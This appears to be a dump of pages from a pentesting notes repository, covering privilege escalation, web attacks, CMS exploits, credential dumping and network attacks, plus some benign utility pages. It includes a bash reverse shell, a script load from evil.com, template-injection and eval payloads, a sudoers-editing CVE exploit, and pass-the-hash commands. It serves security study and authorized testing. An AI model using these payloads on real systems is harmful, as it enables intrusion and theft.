from a trusted source 27 | model.load_state_dict(torch.load('example.pt')) 28 | print(model) 29 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/rust.md: -------------------------------------------------------------------------------- 1 | # Rust Privilege Escalation 2 | 3 | Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have write permission on a Rust source file, we may be able to inject arbitrary code to escalate privileges. 
4 | 5 | ## Reverse Shell 6 | 7 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs 8 | 9 | We can create a binary or module that spawns a reverse shell. 10 | 11 | ```bash 12 | cd /path/to/rust/project/src 13 | vim lib.rs 14 | (In the vim editor, insert reverse shell code into the file) 15 | cargo build 16 | ``` 17 | 18 | ## References 19 | 20 | - [HackTricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) 21 | -------------------------------------------------------------------------------- /docs/exploit/web/cms/mara.md: -------------------------------------------------------------------------------- 1 | # Mara CMS Pentesting 2 | 3 | Mara CMS is a file-based content management system. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:changeme 9 | ``` 10 | 11 | ## Remote Code Execution (RCE) v7.5 12 | 13 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780) 14 | 15 | ### Automation 16 | 17 | ```bash 18 | msfconsole 19 | msf> use exploit/multi/http/maracms_upload_exec 20 | msf> set rhosts 21 | msf> set lhost 22 | msf> set srvhost 23 | msf> set srvport 24 | msf> set targeturi /path/to/maracms/ 25 | msf> set targeturipath /path/to/maracms/ 26 | ``` 27 | 28 | ## References 29 | 30 | - [Exploit DB](https://www.exploit-db.com/exploits/48780) 31 | -------------------------------------------------------------------------------- /docs/exploit/archives/tar.md: -------------------------------------------------------------------------------- 1 | # Tar 2 | 3 | The tar command is a utility used to create, manipulate, and extract archive files. "tar" stands for "tape archive". 
4 | 5 | ## Archive Files 6 | 7 | ```sh 8 | # -c: Create a new archive 9 | # -f: Use archive file 10 | tar -cf archive.tar example.txt 11 | tar -cf archive.tar example1.txt example2.txt 12 | # -z: filter the archive through gzip 13 | tar -zcf example.tar.gz example/ 14 | ``` 15 | 16 | ## Extract Files 17 | 18 | ```sh 19 | # -x: Extract files from an archive 20 | # -f: Use archive file (GNU tar detects gzip/bzip2/xz compression automatically on extraction) 21 | tar -xf archive.tar 22 | tar -xf archive.tar.gz 23 | # --directory / -C: extract into the given directory (it must already exist) 24 | tar -xf archive.tar --directory archived 25 | ``` 26 | 27 | ## Display Contents without Extracting 28 | 29 | ```sh 30 | # -t: list members; check for absolute paths, ../ and odd symlinks before extracting an untrusted archive 31 | tar -tf archive.tar 32 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/port-forwarding/plink.md: -------------------------------------------------------------------------------- 1 | # Port Forwarding using Plink 2 | 3 | Plink is the Windows command-line version of the PuTTY SSH client. 4 | 5 | ## Reverse Connection 6 | 7 | ### 1. Open a Listener on Your Local Machine 8 | 9 | ```sh 10 | nc -lvnp 4444 11 | ``` 12 | 13 | ### 2. Run the Reverse Connection on the Target Machine 14 | 15 | First, generate an SSH key pair on the attacker machine and add the public key to the attacker's `~/.ssh/authorized_keys`; the target will use the private key to authenticate back to us. 16 | 17 | ```sh 18 | ssh-keygen 19 | ``` 20 | 21 | Convert the private key to PuTTY's format and copy it to the target. 22 | 23 | ```sh 24 | puttygen private_key -o private_key.ppk 25 | ``` 26 | 27 | Run the reverse connection using plink. `echo y` accepts the host-key prompt; `-R` binds a port on the attacker machine that is forwarded to the target-side host:port, and `-N` opens no shell. 28 | 29 | ```powershell 30 | cmd.exe /c echo y | .\plink.exe -R <attacker-port>:<target-host>:<target-port> attacker@<attacker-ip> -i private_key.ppk -N 31 | ``` 32 | 33 | Once the tunnel is up, `<target-host>:<target-port>` is reachable on the attacker machine at `127.0.0.1:<attacker-port>`. -------------------------------------------------------------------------------- /docs/exploit/network/protocol/ntp.md: -------------------------------------------------------------------------------- 1 | # NTP (Network Time Protocol) Pentesting 2 | 3 | NTP is a networking protocol for clock synchronization between computer systems over packet-switched networks. The default port is 123/UDP. 
4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script ntp-info -p 123 <target> 9 | nmap -sU --script ntp-monlist -p 123 <target> 10 | nmap -sU --script ntp* -p 123 <target> 11 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 <target> 12 | ``` 13 | 14 | ### Ntpq 15 | 16 | The mode 7 `monlist` query (ntpdc) returns up to 600 recent clients and was the amplifier behind NTP DDoS attacks; it is disabled by default in ntpd 4.2.7p26 and later, so it usually only works against old servers. 17 | 18 | ```sh 19 | ntpq -c readlist <target> 20 | ntpq -c readvar <target> 21 | ntpq -c peers <target> 22 | ntpq -c associations <target> 23 | ntpdc -c monlist <target> 24 | ntpdc -c listpeers <target> 25 | ntpdc -c sysinfo <target> 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/key-derivation-functions/scrypt.md: -------------------------------------------------------------------------------- 1 | # Scrypt 2 | 3 | Scrypt is a memory-hard password-based key derivation function: its cost parameters make every guess expensive in memory as well as CPU time, which is what slows down brute-force cracking. 4 | 5 | ## Using Scrypt in Python 6 | 7 | We can use scrypt easily thanks to PyCryptodome. 8 | We need to install it first. 9 | 10 | ```bash 11 | pip install pycryptodome 12 | ``` 13 | 14 | Below is a Python script to derive a 16-byte key from a password with scrypt (`N` is the CPU/memory cost, `r` the block size, `p` the parallelism). 15 | 16 | ```python 17 | from Crypto.Protocol.KDF import scrypt 18 | from Crypto.Random import get_random_bytes 19 | 20 | password = b'secret' 21 | salt = get_random_bytes(16)  # a fresh random salt per password 22 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1)  # 16 = key length in bytes 23 | print(f"key: {key.hex()}") 24 | ``` 25 | 26 | ## References 27 | 28 | - [PyCryptodome](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt) 29 | -------------------------------------------------------------------------------- /docs/exploit/web/codiad.md: -------------------------------------------------------------------------------- 1 | # Codiad Pentesting 2 | 3 | Codiad is a web-based IDE framework. 
4 | 5 | ## Default Credentials 6 | 7 | ```sh 8 | # Docker image - https://hub.docker.com/r/bitnami/codiad 9 | user:bitnami 10 | ``` 11 | 12 | ## Enumeration 13 | 14 | ```bash 15 | # Get current directory in the system 16 | /components/project/controller.php?action=get_current 17 | ``` 18 | 19 | ## Remote Code Execution (RCE) v2.8.4 20 | 21 | This exploit is authenticated: it need a valid Codiad username and password (`admin admin` below). 22 | 23 | ```bash 24 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py 25 | 26 | # Linux 27 | python3 exploit.py https://example.com/ admin admin 4444 linux 28 | # Windows 29 | python3 exploit.py https://example.com/ admin admin 4444 windows 30 | ``` 31 | 32 | ## References 33 | 34 | - [Exploit DB](https://www.exploit-db.com/exploits/49705) -------------------------------------------------------------------------------- /docs/exploit/web/tool/burpsuite-troubleshooting.md: -------------------------------------------------------------------------------- 1 | # Burp Suite Troubleshooting 2 | 3 | This article collects fixes for common Burp Suite problems. 4 | 5 | ## Fix Error “Failed to connect to x.x.x.x:443” 6 | 7 | This error occurs when we browse to a plain-HTTP URL, because Burp’s embedded browser upgrades connections to HTTPS by default, and the target has nothing listening on port 443. 8 | 9 | If we get the error, we can turn the upgrade off as follows: 10 | 11 | 1. In the embedded browser, open Settings by clicking on the three-dots menu icon. 12 | 2. Once the Settings screen opens, go to “Privacy and security” → “Security”. 13 | 3. In the “Advanced” section, uncheck “Always use secure connections”, then close the Settings. 14 | 4. Enter the desired URL including “http://”. **If all goes well, we can now access it.** -------------------------------------------------------------------------------- /docs/exploit/archives/7z-password-cracking.md: -------------------------------------------------------------------------------- 1 | # 7z Password Cracking 2 | 3 | If a 7z file is password-protected, we can try to crack the password offline. 
4 | 5 | ## Crack 6 | 7 | ### 1. Convert to Hash 8 | 9 | First we need to convert the `.7z` file to a hash. 10 | 11 | ```sh 12 | 7z2john example.7z > hash.txt 13 | # or 14 | /usr/share/john/7z2john.pl example.7z > hash.txt 15 | ``` 16 | 17 | If we get the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install the `libcompress-raw-lzma-perl` package: 18 | 19 | ```bash 20 | sudo apt install libcompress-raw-lzma-perl 21 | ``` 22 | 23 | ### 2. Crack the Hash 24 | 25 | Now we can crack the hash with one of the commands below: 26 | 27 | ```sh 28 | john --wordlist=wordlist.txt hash.txt 29 | # or (-m 11600 is hashcat's 7-Zip mode) 30 | hashcat -m 11600 hash.txt wordlist.txt 31 | ``` 32 | -------------------------------------------------------------------------------- /docs/exploit/web/cms/cockpit.md: -------------------------------------------------------------------------------- 1 | # Cockpit CMS Pentesting 2 | 3 | Cockpit CMS is a content management system for publishing content. 4 | 5 | ## Enumeration & Remote Code Execution (RCE) & Reverse Shell 6 | 7 | ```bash 8 | # Reset password (CVE-2020-35847) 9 | msf> use exploit/multi/cockpit_cms_rce 10 | msf> set USER admin 11 | msf> run 12 | ``` 13 | 14 | ## Version Detection 15 | 16 | The Cockpit CMS version is displayed as the value of the “data-version” attribute in the `<html>` tag. 17 | 18 | ```bash 19 | 20 | ``` 21 | 22 | ## Common Directories 23 | 24 | ```bash 25 | /auth/check # We can enumerate users using the path 26 | /auth/forgotpassword 27 | /auth/index 28 | /auth/login 29 | /auth/requestreset # We can enumerate users using the path 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/browser/firefox.md: -------------------------------------------------------------------------------- 1 | # FireFox Credentials Dumping 2 | 3 | The `.mozilla/firefox` profile directory stores saved logins (`logins.json`, encrypted with keys kept in `key4.db`). 4 | We may dump these credentials and escalate privileges using them. 
5 | 6 | ## Investigation 7 | 8 | If there is a `.mozilla/firefox` directory in some user's home directory, we can try to dump credentials. So check this directory: 9 | 10 | ```sh 11 | ls -al /home/<user>/.mozilla/ 12 | ``` 13 | 14 | ## Dump Passwords from Firefox Profile 15 | 16 | To decrypt the saved logins, use [firefox_decrypt](https://github.com/unode/firefox_decrypt): 17 | 18 | ```sh 19 | python3 firefox_decrypt.py .mozilla/firefox/<profile> 20 | ``` 21 | 22 | If we are asked for a master password and do not know it, try common passwords. 23 | 24 | ```txt 25 | admin 26 | password 27 | password1 28 | password123 29 | root 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/email/pop.md: -------------------------------------------------------------------------------- 1 | # POP (Post Office Protocol) Pentesting 2 | 3 | Post Office Protocol is an application-layer protocol used by email clients to retrieve mail. POP3 is the version in common use. Default ports are 110 (plaintext) and 995 (POP3 over TLS). Credentials sent on port 110 are visible to anyone who can capture the traffic. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 <target> 9 | ``` 10 | 11 | ## Connect 12 | 13 | ```bash 14 | nc <target> 110 15 | # or 16 | telnet <target> 110 17 | ``` 18 | 19 | ## Commands 20 | 21 | ```bash 22 | # Login 23 | USER <username> 24 | PASS <password> 25 | 26 | # Number and total size of all messages 27 | STAT 28 | # List messages and sizes 29 | LIST 30 | # Retrieve the message with the given number 31 | RETR <n> 32 | # Delete the message with the given number 33 | DELE <n> 34 | # Reset the mailbox (undo deletions in this session) 35 | RSET 36 | # Exit the mail server 37 | QUIT 38 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/host-header-attack.md: -------------------------------------------------------------------------------- 1 | # Host Header Attack 2 | 3 | ## Abuse Connection State 4 | 5 | If the front-end server validates the Host header only on the first request of a connection, we may be able to reach an internal host by keeping the connection open and changing the **Host** header on the second request. 
6 | 7 | Both requests must travel over the same HTTP/1.1 keep-alive connection (in Burp Repeater, send them as a group on a single connection); HTTP/2 multiplexes requests and does not use the Connection header. 8 | 9 | ### 1. Send the First Request 10 | 11 | ```bash 12 | GET / HTTP/1.1 13 | Host: example.com 14 | ... 15 | Connection: keep-alive 16 | 17 | ``` 18 | 19 | ### 2. Send the Second Request 20 | 21 | ```bash 22 | POST /admin/change-email HTTP/1.1 23 | Host: 192.168.0.1 24 | 25 | email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com 26 | ``` 27 | 28 | As a result, we may be able to change the admin's email to an arbitrary address. 29 | 30 | ## References 31 | 32 | - [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/exponentiation.md: -------------------------------------------------------------------------------- 1 | # Exponentiation 2 | 3 | ## Basic 4 | 5 | We can calculate exponentiation using the **'\*\*'** operator in Python. 6 | 7 | ```python 8 | 2 ** 4 9 | # 16 10 | 11 | 6 ** 8 12 | # 1679616 13 | ``` 14 | 15 | ## Using the Pow Function in Python 16 | 17 | The built-in **`pow`** function can also be used for exponentiation. 18 | 19 | ```python 20 | pow(2, 4) 21 | # 2 ** 4 = 16 22 | ``` 23 | 24 | ### Modular Exponentiation 25 | 26 | With a third argument, `pow` returns the remainder of the raised value divided by the modulus, without ever building the huge intermediate number. 27 | This is the core operation of RSA, Diffie-Hellman and most other public-key schemes, so it comes up constantly in crypto challenges. 28 | 29 | ```python 30 | pow(2, 4, 6) 31 | # 2 ** 4 % 6 = 4 32 | ``` 33 | 34 | ## Inverse 35 | 36 | The modular inverse of `a` mod `m` is the `x` with `a * x ≡ 1 (mod m)`; it exists only when `gcd(a, m) == 1`. `pow` with exponent `-1` supports this from Python 3.8. 37 | 38 | ```python 39 | from Crypto.Util.number import inverse 40 | 41 | inverse(3, 10) # 7 42 | pow(3, -1, 10) # 7 43 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/http-rate-limit-bypass.md: -------------------------------------------------------------------------------- 1 | # HTTP Rate Limit Bypass 2 | 3 | The 429 “Too Many Requests” status code is returned when the client has sent too many requests in a given amount of time (rate limiting). 
The server is limiting the number of requests per client. However, we may be able to bypass this restriction. 4 | 5 | ## Bypass 6 | 7 | If the limit is keyed on the client IP and the application trusts proxy headers, we may be able to bypass it by adding one of the following headers with a different IP address in each request. 8 | Sometimes we need to add several of them at once. 9 | 10 | ```bash 11 | X-Forwarded: <ip> 12 | X-Forwarded-For: <ip> 13 | X-Forwarded-Host: <ip> 14 | X-Client-IP: <ip> 15 | X-Remote-IP: <ip> 16 | X-Remote-Addr: <ip> 17 | X-Host: <ip> 18 | X-Originating-IP: <ip> 19 | ``` 20 | 21 | ## References 22 | 23 | - [InfoSec Writeups](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c) -------------------------------------------------------------------------------- /docs/exploit/web/template-engine/jsrender-template-injection.md: -------------------------------------------------------------------------------- 1 | # JsRender Template Injection 2 | 3 | JsRender is a lightweight but powerful JavaScript template engine. If user input is compiled as a template rather than passed in as data, it is vulnerable to template injection. 4 | 5 | ## Investigation 6 | 7 | Try to insert arbitrary code into double curly brackets. If the result of the expression is reflected in the page, we can inject code into the template. 8 | 9 | ```bash 10 | {{:2*3}} 11 | {{:"test".toString}} 12 | ``` 13 | 14 | ## Exploitation 15 | 16 | `"test".toString.constructor` is `Function`, so `call` builds a new function from a string; the trailing `()` invokes it. 17 | 18 | ```bash 19 | # XSS 20 | {{:"test".toString.constructor.call({},"alert(1)")()}} 21 | # Read local files (server-side rendering with Node.js) 22 | {{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}} 23 | ``` 24 | 25 | ## References 26 | 27 | - [AppCheck](https://appcheck-ng.com/template-injection-jsrender-jsviews) -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/login-windows-shell.md: -------------------------------------------------------------------------------- 1 | # Login Windows Shell 2 | 3 | If we have credentials for a target Windows system, we can execute commands on it from a Linux machine. 
4 | 5 | ## Impacket PsExec 6 | 7 | PsExec gives us an interactive SYSTEM shell on the Windows host. It uploads a service binary to the `ADMIN$` share and installs a service, so it needs local administrator rights and is noisy (a service-installed event, ID 7045, lands in the System log). 8 | 9 | ```sh 10 | impacket-psexec username:password@<target> 11 | # Pass the Hash (-hashes LMHASH:NTHASH) 12 | impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1 13 | ``` 14 | 15 | ## Impacket WmiExec 16 | 17 | WmiExec uses Windows Management Instrumentation (WMI) to run each command as a new process and reads the output back over SMB; no service is installed, so it is quieter than PsExec. 18 | 19 | ```sh 20 | impacket-wmiexec example.local/username@10.0.0.1 21 | # Pass the Hash 22 | impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1 23 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/tool/pwsafe.md: -------------------------------------------------------------------------------- 1 | # Password Safe Pentesting 2 | 3 | Password Safe is a password database utility. If we find a `.psafe3` database, we may be able to retrieve the passwords stored in it. 4 | 5 | ## Install PasswordSafe Manager 6 | 7 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it. 
8 | 9 | For example, if you use Debian, download the `.deb` package and run the following command: 10 | 11 | ```bash 12 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb 13 | ``` 14 | 15 | ## Analyze `.pwsafe3` file 16 | 17 | ```bash 18 | pwsafe example.pwsafe3 19 | ``` 20 | 21 | ## Crack `.pwsafe` Password 22 | 23 | If a password is required to open the `.pwsafe` file in the PasswordSafe manager, we might be able to crack it offline as below: 24 | 25 | ```bash 26 | pwsafe2john example.pwsafe3 > hash.txt 27 | john --wordlist=wordlist.txt hash.txt 28 | ``` -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | site_name: Exploit Notes 2 | site_url: https://exploit-notes.hdks.org 3 | repo_url: https://github.com/hdks-bug/exploit-notes 4 | theme: 5 | name: material 6 | custom_dir: overrides 7 | favicon: assets/icon.png 8 | logo: assets/icon-nobg.png 9 | font: 10 | text: Noto Sans 11 | language: en 12 | palette: 13 | scheme: slate 14 | primary: black 15 | accent: deep purple 16 | features: 17 | - header.autohide 18 | - navigation.top 19 | - content.code.copy 20 | markdown_extensions: 21 | - pymdownx.highlight: 22 | anchor_linenums: true 23 | line_spans: __span 24 | pygments_lang_class: true 25 | - pymdownx.inlinehilite 26 | - pymdownx.snippets 27 | - pymdownx.superfences 28 | plugins: 29 | - search 30 | - social 31 | extra: 32 | analytics: 33 | provider: google 34 | property: G-RR6XYHYTQ9 -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/sudoedit.md: -------------------------------------------------------------------------------- 1 | # Sudoedit Privilege Escalation 2 | 3 | A `sudoedit` rule that allows editing one specific file can be abused to edit arbitrary files on vulnerable sudo versions (1.8.0 through 1.9.12p1, CVE-2023-22809). 
4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) sudoedit /opt/example.txt 11 | ``` 12 | 13 | If we can run `sudoedit` as root on some file and the installed sudo is a vulnerable version, we can escalate privileges. 14 | 15 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf)) 16 | 17 | Vulnerable versions pass the contents of `EDITOR`, `VISUAL` or `SUDO_EDITOR` to the editor without handling `--` correctly, so anything after `--` is treated as an extra file for sudoedit to open with root privileges. 18 | 19 | ```bash 20 | export EDITOR="vim -- /etc/sudoers" 21 | sudoedit /opt/example.txt 22 | ``` 23 | 24 | In the vim editor, add the following line to **`/etc/sudoers`**. 25 | Assume the current username is “john”. 26 | 27 | ```bash 28 | john ALL=(ALL:ALL) ALL 29 | ``` 30 | 31 | After that, we can escalate to root. 32 | 33 | ```bash 34 | sudo su root 35 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/dom-cloberring.md: -------------------------------------------------------------------------------- 1 | # DOM Clobbering 2 | 3 | ## Basic Exploitation 4 | 5 | If the website adds a script to the DOM when the page loads, as below, 6 | 7 | ```jsx 8 | window.onload = function() { 9 | let someObj = window.someObj || {}; 10 | let script = document.createElement('script'); 11 | script.src = someObj.url; 12 | document.body.appendChild(script); 13 | } 14 | ``` 15 | 16 | we may clobber **`window.someObj`** with HTML elements that carry `id`/`name` attributes (nested **`anchor`** elements work because a collection of same-named elements exposes its members by `name`), overriding the **`url`** property so the page loads a script from our host and executes arbitrary JavaScript. 17 | For example, insert the following markup wherever HTML is injectable (a comment, a search field, etc.) on the target website. 
18 | 19 | ```html 20 | <a id="someObj"><a id="someObj" name="url" href="https://evil.com/evil.js"></a></a> 21 | ``` 22 | 23 | ## References 24 | 25 | - [DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering) 26 | -------------------------------------------------------------------------------- /docs/exploit/game/chess-game-cheating.md: -------------------------------------------------------------------------------- 1 | # Chess Game Cheating 2 | 3 | ## FEN Manipulation 4 | 5 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`. 6 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string. 7 | For example, the position below gives us (White, uppercase letters) queens everywhere except the king, while the opponent (Black, lowercase) has only pawns apart from the king. 8 | 9 | ```bash 10 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ 11 | # or, with the side to move, castling rights, en passant square and move counters 12 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1 13 | ``` 14 | 15 | Then paste the FEN string into a `.fen` file. 16 | Alternatively, paste it into [pastebin](https://pastebin.com/) and click the “raw” button to get a URL for the raw text. 17 | This file or URL can then be uploaded to, or used to manipulate, the target website. -------------------------------------------------------------------------------- /docs/exploit/container/docker/docker-registry.md: -------------------------------------------------------------------------------- 1 | # Docker Registry Pentesting 2 | 3 | Docker Registry is a stateless, highly scalable server-side application that stores and lets you distribute Docker images. The default port is 5000. A registry exposed without authentication lets anyone pull every image, and image layers frequently contain secrets. 4 | 5 | ## Endpoints 6 | 7 | ```bash 8 | /v2/_catalog 9 | /v2/<name>/tags/list 10 | # We can download the manifest for a given tag. 11 | /v2/<name>/manifests/<tag> 12 | ``` 13 | 14 | ## Extract Layers 15 | 16 | After downloading the manifest, look for the layer digests (`sha256:abcd...`): in a schema 1 manifest they are the `blobSum` values under `fsLayers`, in schema 2 the `digest` of each entry under `layers`. Each one is a gzipped tar of that layer's filesystem. 17 | 18 | ```bash 19 | curl -so 1.tar https://example.com:5000/v2/<name>/blobs/sha256:abcd... 
20 | tar -xvf 1.tar 21 | ``` 22 | 23 | After extracting the tar files, search the resulting files and directories for sensitive information (configuration files, `.env` files, shell history, private keys). 24 | 25 | ## References 26 | 27 | - [tbhaxor](https://tbhaxor.com/exploiting-insecure-docker-registry/) 28 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-eval.md: -------------------------------------------------------------------------------- 1 | # Python Eval Code Execution 2 | 3 | Python's built-in `eval()` executes whatever expression it is given, so passing user-controlled input to it is arbitrary code execution. 4 | 5 | ## Investigation 6 | 7 | ```py 8 | eval(text) 9 | eval(f"5 + {num}") 10 | ``` 11 | 12 | If the Python script lets us control the **"text"** (or **"num"**) value, we can inject arbitrary code. 13 | 14 | ## Arbitrary Code Execution 15 | 16 | Most of the time our input is spliced into a larger expression, so we first have to close the surrounding syntax before appending our command (and may need a trailing `#` to comment out the rest). 17 | 18 | ```txt 19 | __import__('os').system('id') 20 | 21 | 22 | ),__import__('os').system('id') 23 | '),__import__('os').system('id') 24 | },__import__('os').system('id') 25 | ),__import__('os').system('id')# 26 | ``` 27 | 28 | ### Reverse Shell 29 | 30 | ```txt 31 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"') 32 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/computer-vision/image-recognition-bypass.md: -------------------------------------------------------------------------------- 1 | # Image Recognition Bypass for Machine Learning 2 | 3 | We can trick an image recognizer or classifier by applying filters to, or otherwise obfuscating, an image so that its features no longer match what the model learned. 
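For the Python `eval()` page above: the fix a reviewer asks for is never "sanitize the string", it is "stop evaluating strings". The following is an added example, not code from the original page. It places the page's vulnerable `eval(f"5 + {num}")` pattern beside a hardened replacement that parses the input with `ast` and walks the tree, allowing only numeric literals and arithmetic operators, so the page's `__import__('os').system('id')` payload is rejected before anything runs. Function names and the exponent cap are assumptions for this example.

```python
import ast
import operator

# The pattern from the page: user input is spliced straight into eval().
def vulnerable_add(num: str):
    return eval(f"5 + {num}")  # "3" -> 8, but also runs __import__('os').system('id')


_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
            ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def safe_eval_arith(expr: str, max_pow: int = 1000):
    """Evaluate an arithmetic expression by walking its AST.

    Only int/float literals, unary +/- and the binary operators in _BIN_OPS are
    allowed. Names, calls, attributes, subscripts and lambdas are rejected before
    execution, so there is no way to reach __import__, os or system.
    """
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
                and not isinstance(node.value, bool)):
            return node.value
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > max_pow:
                raise ValueError("exponent too large")  # cheap CPU/memory DoS guard
            return _BIN_OPS[type(node.op)](left, right)
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


def safe_add(num: str):
    """Hardened replacement for vulnerable_add()."""
    return 5 + safe_eval_arith(num)


if __name__ == "__main__":
    print(safe_add("3"))                       # 8
    for payload in ("__import__('os').system('id')", "(lambda: 1)()", "9 ** 99999"):
        try:
            safe_add(payload)
        except ValueError as err:
            print("rejected:", payload, "->", err)
```

When the input really is just a number, `int(num)` is the right answer and no evaluator is needed at all; the AST walker is for the case where a small expression language is genuinely required.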
4 | 5 | ## Blurring 6 | 7 | ```python 8 | from PIL import Image 9 | from PIL import ImageFilter 10 | 11 | img = Image.open("example.png") 12 | 13 | # Box blur 14 | img1 = img.filter(ImageFilter.BoxBlur(5)) 15 | # Gaussian blur 16 | img2 = img.filter(ImageFilter.GaussianBlur(5)) 17 | # Median filter 18 | img3 = img.filter(ImageFilter.MedianFilter(size=5)) 19 | # Rank filter 20 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5)) 21 | 22 | # Save the variant and test it against the classifier 23 | img1.save("example_blurred.png") 24 | ``` 25 | 26 | ## Cropping/Rotating 27 | 28 | ```python 29 | from PIL import Image 30 | 31 | img = Image.open("example.png") 32 | img = img.resize((512, 512)) 33 | 34 | # crop box is (left, upper, right, lower); rotate is in degrees counter-clockwise 35 | img1 = img.crop((0, 0, 300, 280)).rotate(-60) 36 | img1.save("example_cropped.png") 37 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/apache-activemq.md: -------------------------------------------------------------------------------- 1 | # Apache ActiveMQ Pentesting 2 | 3 | Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | ``` 10 | 11 | ## Interaction with MQTT 12 | 13 | If the MQTT transport is enabled on the target system, we can subscribe/publish to a topic in ActiveMQ using an MQTT client. 14 | 15 | ### Subscribe to a Topic 16 | 17 | ```bash 18 | # -h: Host 19 | # -t: Topic name 20 | # -V: MQTT protocol version (5, 31, 311) 21 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31 22 | ``` 23 | 24 | ## Web Shell by File Upload JSP 25 | 26 | ActiveMQ 5.x before 5.11.2 (CVE-2015-1830) lets an attacker upload an arbitrary JSP file through the `fileserver` servlet and reach it via directory traversal, giving a web shell. 27 | 28 | ```bash 29 | msfconsole 30 | msf> use exploit/multi/http/apache_activemq_upload_jsp 31 | msf> set ... 
32 | msf> run 33 | meterpreter> shell 34 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/arp-spoofing.md: -------------------------------------------------------------------------------- 1 | # ARP (Address Resolution Protocol) Spoofing 2 | 3 | ARP is used to find another computer’s MAC address based on its IP address. ARP spoofing sends forged ARP replies so that victims map the gateway’s IP address to the attacker’s MAC, letting the attacker intercept and forward their traffic. 4 | 5 | ## Basic Flow 6 | 7 | 1. **Check Interface and Gateway IP Address** 8 | 9 | ```sh 10 | # Interfaces 11 | ip addr 12 | 13 | # Default gateway 14 | ip route list 15 | ``` 16 | 17 | 2. **Scan the Network to Find the Target IP** 18 | 19 | ```sh 20 | nmap -sP <network>/24 21 | nmap -sP <network>/16 22 | ``` 23 | 24 | 3. **Enable IP Forwarding** 25 | 26 | Without forwarding, the victims' traffic stops at our machine and they notice the outage. 27 | 28 | ```sh 29 | # Turn on forwarding in the kernel 30 | sysctl -w net.ipv4.ip_forward=1 31 | 32 | # Allow all forwarding in the LAN 33 | # -A: append rules 34 | # -i: interface 35 | # -j: jump 36 | iptables -A FORWARD -i eth0 -j ACCEPT 37 | ``` 38 | 39 | ## Find MAC Address 40 | 41 | ```sh 42 | cat /sys/class/net/eth0/address 43 | cat /sys/class/net/enp0s3/address 44 | cat /sys/class/net/tun0/address 45 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/framework/angular.md: -------------------------------------------------------------------------------- 1 | # Angular Pentesting 2 | 3 | AngularJS (the 1.x framework) is a client-side web application framework. 4 | 5 | ## HTML Attributes 6 | 7 | If a website uses AngularJS, an element carries the 